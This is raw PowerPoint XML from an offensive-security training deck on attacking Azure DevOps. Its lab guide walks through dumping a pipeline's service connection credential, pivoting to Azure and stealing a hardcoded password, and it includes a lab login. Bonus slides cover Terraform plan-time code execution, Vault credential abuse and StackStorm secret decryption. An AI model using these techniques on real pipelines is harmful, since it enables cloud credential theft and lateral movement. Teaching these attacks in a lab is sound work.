                          <a:cs typeface="Telegraf"/>
                          <a:sym typeface="Telegraf"/>
                        </a:rPr>
                        <a:t>Configure this task to use the service connection you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 panose="020B0604020202020204" charset="0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 panose="020B0604020202020204" charset="0"/>
                          <a:ea typeface="Telegraf"/>
                          <a:cs typeface="Telegraf"/>
                          <a:sym typeface="Telegraf"/>
                        </a:rPr>
                        <a:t>want to steal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AZURE_CONFIG_DIR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Environment variable pointing to the Azure CLI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configuration folder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%AZURE_CONFIG_DIR%\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service_principal_entries.bin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Encrypted with DPAPI using the Agent’s logged-in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Windows user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Stores cleartext credential for authenticating to Azure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Service Principal - client id, client secret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Workload Identity Federation – client id, client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assertion JWT issued by ADO (vstoken.dev.azure.com)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%AZURE_CONFIG_DIR%\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msal_token_cache.bin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Stores the MSAL access token used to access Azure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resources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D269E67F-0BF6-181B-F4C7-5EFECC1CC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1535" y="3289314"/>
            <a:ext cx="8237221" cy="5974066"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="69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952536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4800600" y="1095375"/>
            <a:ext cx="220599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Dumping Service Connections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096052" y="3198506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443171" y="-1579971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84700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Run Azure CLI task on a Linux or Mac agent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No DPAPI encryption for Linux or Mac, credential is stored in cleartext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addSpnToEnvironment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Azure CLI task setting that lets you access SPN credentials as variables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servicePrincipalId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,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servicePrincipalKey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,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tenantId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az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 account get-access-token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Returns Entra ID access token (JWT)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Entra ID access tokens are not censored in job output logs</a:t>
                      </a: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717038" marR="0" lvl="4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717038" marR="0" lvl="4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DE771A2-6753-69D9-CCAC-0C74A80373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1947" y="6312084"/>
            <a:ext cx="9504105" cy="3848948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="71803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476368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028700" y="3078063"/>
            <a:ext cx="7414512" cy="3754742"/>
            <a:chOff x="0" y="66675"/>
            <a:chExt cx="9886015" cy="500632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75"/>
              <a:ext cx="9243864" cy="3099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4E7E7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Lab 04</a:t>
              </a:r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315300" y="3913855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528661"/>
              <a:ext cx="9886015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Attacking Azure DevOps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2402430-C3C7-892B-E6BF-ED64A51F40ED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835F3CB6-156E-18F3-71E2-1842F3BA2CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="853692">
            <a:off x="-5460915" y="6354666"/>
            <a:ext cx="12348139" cy="10035669"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12348139" h="10035669">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12348140" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12348140" y="10035670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10035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7C17BDE4-B80A-3244-F05B-0FA0C43FA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088225"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6324600" y="1047270"/>
          <a:ext cx="16881989" cy="8869680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4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Scenario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You have obtained a Sharp Bets’ developer’s credential.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No permissions to write to main branch.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No permissions to edit or run the production pipeline.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Use this developer’s credential to steal an Azure credential</a:t>
                      </a:r>
                      <a:b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and pivot to Sharp Bets’ Azure environment.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36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4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Lab Objectives</a:t>
                      </a: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Dump the “</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="32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az</a:t>
                      </a:r>
                      <a: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-storage-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="32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svc_connection</a:t>
                      </a:r>
                      <a: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” service </a:t>
                      </a:r>
                      <a:b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connection credential.</a:t>
                      </a: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Pivot to Azure and steal the cleartext password stored in</a:t>
                      </a:r>
                      <a:b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 PowerShell script.</a:t>
                      </a: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endParaRPr lang="en-US" sz="32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+mj-lt"/>
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="60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http://4.236.176.192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+mj-lt"/>
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="60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developer / Summer2024</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="4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6952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4800600" y="1095375"/>
            <a:ext cx="220599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04: Network Diagram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443171" y="-1579971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4">
              <a:alphaModFix amt="6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75556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1717038" marR="0" lvl="4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717038" marR="0" lvl="4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717038" marR="0" lvl="4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717038" marR="0" lvl="4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717038" marR="0" lvl="4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717038" marR="0" lvl="4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5" descr="A diagram of a firewall&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74D11B6D-97C0-3C88-49EC-3A1EA2E5F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36" y="2827751"/>
            <a:ext cx="14197328" cy="6486525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="71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0229130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4800600" y="1095375"/>
            <a:ext cx="220599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04: Guide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443171" y="-1579971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75556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Navigate to the “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AzStorage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-Ping” Project and open the “Repos” tab on the left-hand side.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Create new branch in the “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AzStorage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-Ping” code repository by clicking on the branches dropdown menu and selecting “New branch”.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Name your branch something unique so you don’t interfere with other lab users.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FB20AC5-6520-4D99-2489-F48DBAD43B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44" y="4939596"/>
            <a:ext cx="10552381" cy="4323809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="67000"/>
              </a:srgb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0C029C-EBA3-2954-FD15-1AA71AA4C4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26862" y="4939596"/>
            <a:ext cx="5946788" cy="4323809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="67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024290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4800600" y="1095375"/>
            <a:ext cx="220599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04: Guide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443171" y="-1579971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097643"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="84700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In your newly created branch, open the “azure-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pipelines.yml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” file and click on “Edit” to open the file editor.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Copy and paste the solution pipelines YAML from the following GitHub repository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https://github.com/sharpbets/materials/blob/main/lab04-ADO/azure-pipelines-LAB_SOLUTION.yaml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Commit your changes by clicking on the “Commit” button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C57CC3D8-5027-EDC6-E46B-35D9D54E3B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28587" y="4076700"/>
            <a:ext cx="4410965" cy="5899666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="64000"/>
              </a:srgb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52B7A8-3E68-7206-FF8D-BB44DC654F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2260" y="4519859"/>
            <a:ext cx="8504686" cy="5456507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="64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7818967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4800600" y="1095375"/>
            <a:ext cx="220599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04: Guide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443171" y="-1579971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75556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Navigate to the Pipelines tab on the left-hand side menu and open the “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AzStorage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-Ping-DEV” pipeline.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Click on the “Run pipeline” button.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Select the branch you created in the “Branch/tag” dropdown menu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Run the pipeline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21A2259-F860-FF4A-635E-70EB9014B4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77800" y="3360141"/>
            <a:ext cx="4571429" cy="6114286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="70861"/>
              </a:srgb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12F873-F48D-BB4D-2696-0C141E4E2F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290" y="4887380"/>
            <a:ext cx="11604945" cy="4534766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="70861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11402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61975" y="3496467"/>
            <a:ext cx="6690444" cy="2475104"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8920591" cy="3300138"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="57150"/>
              <a:ext cx="8920591" cy="284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780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DevOps in the Real World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3170188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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5497916" y="129950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rot="-990888" flipV="1">
            <a:off x="507868" y="-1653295"/>
            <a:ext cx="10372410" cy="3752926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10372410" h="3752926">
                <a:moveTo>
                  <a:pt x="0" y="3752926"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10372409" y="3752926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10372409" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3752926"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5">
              <a:alphaModFix amt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9955175" flipV="1">
            <a:off x="1734305" y="8697504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7">
              <a:alphaModFix amt="6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536590"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7866666" y="858768"/>
          <a:ext cx="10177587" cy="9306384"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5163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4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>
                              <a:alpha val="69000"/>
                            </a:srgbClr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Plan and document projects</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:alpha val="69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Intelligence gathering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>
                              <a:alpha val="69000"/>
                            </a:srgbClr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Write the code and store it</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:alpha val="69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Credential hunting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>
                              <a:alpha val="69000"/>
                            </a:srgbClr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Build the software &amp; test it</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:alpha val="69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Supply chain attacks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>
                              <a:alpha val="69000"/>
                            </a:srgbClr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Create infrastructure</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:alpha val="69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Privilege escalation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>
                              <a:alpha val="69000"/>
                            </a:srgbClr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Deploy software to infra</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:alpha val="69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Lateral movement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>
                              <a:alpha val="69000"/>
                            </a:srgbClr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Configure and troubleshoot</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:alpha val="69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Remote code execution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>
                              <a:alpha val="69000"/>
                            </a:srgbClr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Monitor apps &amp; infra</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:alpha val="69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Sensitive data disclosure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>
                              <a:alpha val="69000"/>
                            </a:srgbClr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Don’t expose secrets</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:alpha val="69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Keys to the kingdom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AutoShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7866666" y="858768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7866666" y="1998111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7866666" y="3194154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7866666" y="4364234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7866666" y="5531644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7866666" y="6664321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7866666" y="7820887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7866666" y="8997486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561975" y="6076823"/>
            <a:ext cx="6690444" cy="252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Does your organization create software? It probably follows a model similar to this.</a:t>
            </a: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F4E7E7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Automation and maturity levels vary, and with that complexity changes.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F4E7E7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12232045" y="1429884"/>
            <a:ext cx="661877" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="F4474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12232045" y="2590469"/>
            <a:ext cx="661877" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="F4474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12232045" y="3779812"/>
            <a:ext cx="661877" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="F4474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12232045" y="4929773"/>
            <a:ext cx="661877" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="F4474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12232045" y="6133973"/>
            <a:ext cx="661877" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="F4474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12232045" y="7234516"/>
            <a:ext cx="661877" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="F4474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>
            <a:off x="12232045" y="8415983"/>
            <a:ext cx="661877" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="F4474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>
            <a:off x="12232045" y="9573820"/>
            <a:ext cx="661877" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="F4474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B65F8E-A58F-53FD-7C63-5DE9466C1A37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4800600" y="1095375"/>
            <a:ext cx="220599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04: Guide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443171" y="-1579971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75556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Open the job log output and wait for the pipeline to execute on an Agent.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Once the pipeline job is complete, open the “Dump service connection” task log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Take the base64 encoded service principal credential and decode it offline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B9941BCC-843E-7CAC-7FF5-5E86478E93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238" y="4151746"/>
            <a:ext cx="7804572" cy="5742988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="69000"/>
              </a:srgb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C7937D-0B67-A1C5-E04F-051EC80C7A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3346" y="5700705"/>
            <a:ext cx="9553483" cy="2375390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="69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8823823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4800600" y="1095375"/>
            <a:ext cx="220599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04: Guide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443171" y="-1579971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75556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Select the “Steal .ps1 script from storage account” task log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Find the hardcoded password in the PowerShell script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F1BF316-1C07-A382-DBD0-17398B8B1B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5040" y="3786963"/>
            <a:ext cx="14197920" cy="6076229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="F44747">
                <a:alpha val="72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0300731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961599" y="-2782197"/>
            <a:ext cx="11098426" cy="16596766"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11098426" h="16596766">
                <a:moveTo>
                  <a:pt x="11098426" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16596766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11098426" y="16596766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28700" y="2095501"/>
            <a:ext cx="7414512" cy="5337454"/>
            <a:chOff x="0" y="66675"/>
            <a:chExt cx="9886015" cy="587002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75"/>
              <a:ext cx="9243864" cy="38257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Bonus</a:t>
              </a:r>
            </a:p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DevOps</a:t>
              </a:r>
            </a:p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Pivoting</a:t>
              </a:r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315300" y="3913855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528662"/>
              <a:ext cx="9886015" cy="1408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Terraform</a:t>
              </a:r>
            </a:p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Vault</a:t>
              </a:r>
            </a:p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StackStorm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4E7E7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2402430-C3C7-892B-E6BF-ED64A51F40ED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Terraform creates and manages cloud platforms and services through their APIs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1550268F-41E1-9354-A8FF-FE78895DC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9" t="37453" r="51211" b="40405"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11917045" y="1928169"/>
            <a:ext cx="1828800" cy="18288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uthenticate with token auth">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E91AD5-3906-3A32-F626-ACCA0C702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1" t="32881" r="30975" b="34234"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11917044" y="4076700"/>
            <a:ext cx="1828800" cy="18288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tackStorm · GitHub">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8398CC1F-0219-EABA-E2D2-DF79144F7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5497" y="6195369"/>
            <a:ext cx="1828800" cy="18288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621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987068"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="38980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.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tfstate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files for creds, or if you have an atlasv1 token then can run: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terraform state pull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Terraform .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tf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file resource modifications (alter services, add accounts, etc.) – risky!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Plan-only RCE attack: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Used against Terraform Cloud (TFC) or Terraform Enterprise (TFE, on-prem)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Process: modify backend configuration, add a new custom ‘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provider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’ and ‘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output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’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terraform plan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will execute malicious code on Terraform server, but nothing is applied!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Reference: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https://hackingthe.cloud/terraform/terraform_enterprise_metadata_service/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07AAF8D1-B105-1F5A-CFB5-5B986A37E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463291"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="6023180"/>
          <a:ext cx="8385690" cy="4297680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8385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802638" lvl="2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import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json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802638" lvl="2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import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os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802638" lvl="2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802638" lvl="2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stream =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os.popen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(‘id')</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="802638" lvl="2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output =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stream.read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()</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="802638" lvl="2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802638" lvl="2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result = { "result" : output }</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="802638" lvl="2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802638" lvl="2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print(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json.dumps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(result))</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="802638" lvl="2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802638" lvl="2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2" descr="Code Execution Output">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CB88DA8-5074-5D69-6719-6C3707FD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940" y="5995698"/>
            <a:ext cx="8066847" cy="3733799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="71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81FBCF29-5377-D1C2-F6A1-FBE581257057}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7828042" y="7930737"/>
            <a:ext cx="7571745" cy="126088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2" descr="Terraform creates and manages cloud platforms and services through their APIs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F04BA5D-C409-8289-7744-87CB3E47B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9" t="37453" r="51211" b="40405"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="400964" y="607893"/>
            <a:ext cx="1371600" cy="13716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HashiCorp</a:t>
            </a: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 Terraform</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15543067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HashiCorp</a:t>
            </a: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 Vault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406121"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="7096379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ts val="363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Dynamic Secrets Engines for Cloud</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="688338" lvl="1" indent="-342900" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="363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Applies to Secrets Engines like: Azure, AWS, GCP, etc.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="688338" lvl="1" indent="-342900" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="363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Admin configures the Vault with a powerful cloud service account</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="688338" lvl="1" indent="-342900" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="363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Cloud service account is responsible for managing other cloud service accounts</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="688338" lvl="1" indent="-342900" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="363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You can abuse this to dynamically generate cloud credentials!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---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vault read azure/creds/my-role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Key                Value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---                -----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lease_id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          azure/creds/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sp_role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/1afd0969…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lease_duration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    60m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lease_renewable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   true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client_id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         408bf248-dd4e-4be5-919a-7f6207a307ab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client_secret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     ad06228a-2db9-4e0a-8a5d-e047c7f32594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Vault-backed dynamic credentials authenticates to Vault with OIDC, then uses Vault secrets engines to generate cloud credentials for Terraform Cloud runs.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E584B4DE-09EC-E042-DA31-FBA79C980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0" t="6704" r="10641" b="6157"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9388377" y="5285757"/>
            <a:ext cx="8408693" cy="3123228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="73723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uthenticate with token auth">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B85371F6-72E9-7CB9-E931-ECE62880A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1" t="32881" r="30975" b="34234"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="344897" y="786731"/>
            <a:ext cx="1287307" cy="128730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477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StackStorm</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="9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056754"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="8199120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Operations platforms are targets for lateral movement too!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StackStorm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Actions - execute on remote infrastructure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Datastore – holds secrets...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SSH keys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Azure service principals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AWS AKIA keys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User credentials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Private key passphrases</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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20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How to decrypt (-n -1 = get all key-value pairs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st2 key list -n -1 –d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---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st2 key set bob Password123 –encrypt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20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st2 key list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+------+-------------------------+--------+-----------+--------------+------+------------------+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| name | value                   | secret | encrypted | scope        | user | </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="20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expire_timestamp</a:t>
                      </a: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|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+------+-------------------------+--------+-----------+--------------+------+------------------+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| bob  | 3030303030F60294E3A0AE9 | True   | True      | st2kv.system |      |                  |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|      | 904AAC0C1B9E7F5C93CEDE  |        |           |              |      |                  |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+------+-------------------------+--------+-----------+--------------+------+------------------+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20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8D9D5-3178-71E8-7118-CAC6839D15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r="17336"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9348014" y="3086100"/>
            <a:ext cx="8412480" cy="496252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2" descr="StackStorm · GitHub">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{098A9B8C-0960-36A0-B20C-F97DC0711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40" y="637171"/>
            <a:ext cx="1383148" cy="138314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B01F8E47-E168-5A7F-29BA-FE5A8B486AFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9348013" y="7658100"/>
            <a:ext cx="3986987" cy="418008"/>
          </a:xfrm>
          <a:prstGeom prst="frame">
            <a:avLst>
              <a:gd name="adj1" fmla="val 27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A0D1DEA0-F3A9-A50C-3AE1-40BF1A5189B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9348013" y="5906046"/>
            <a:ext cx="3986987" cy="418008"/>
          </a:xfrm>
          <a:prstGeom prst="frame">
            <a:avLst>
              <a:gd name="adj1" fmla="val 27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363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779136">
            <a:off x="-3098569" y="-7869264"/>
            <a:ext cx="18355375" cy="14917914"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="18355375" h="14917914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79136">
            <a:off x="6702128" y="3382569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6919368"/>
            <a:ext cx="4117290" cy="97318"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4117290" h="97318">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4117290" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4117290" y="97318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="973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7507269"/>
            <a:ext cx="13642183" cy="1206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6"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="28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Tom Porter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3236"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="28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Colbert Zhu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3236"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2311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4954208"/>
            <a:ext cx="13642183" cy="1602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0"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="623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6230"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="623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THANK YOU!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6780700" y="4442171"/>
            <a:ext cx="4726600" cy="4440137"/>
          </a:xfrm>
